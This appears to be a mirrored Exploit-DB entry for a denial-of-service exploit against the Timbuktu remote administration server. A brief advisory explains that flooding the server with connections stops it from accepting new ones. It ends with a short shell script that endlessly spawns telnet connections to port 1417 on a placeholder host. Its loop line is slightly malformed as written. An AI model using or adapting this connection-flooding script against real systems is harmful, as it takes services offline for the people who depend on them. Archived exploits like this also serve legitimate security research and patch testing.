exploit-db-mirror/exploits/osx/dos/21234.sh
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

11 lines
No EOL
530 B
Bash
Executable file

source: https://www.securityfocus.com/bid/3918/info
Timbuktu is a remote administration tool. It is available for the Microsoft Window's family of operating systems and Power PC based Macintosh computers. It supports a variety of administrative tasks, including full remote access to the user's desktop.
A vulnerability exists in some versions of Timbuktu. If a large number of connections are created to the Timbuktu server, the server will no longer accept new connections.
#!/bin/sh
while:
do
telnet tb2.host.com 1417 &
done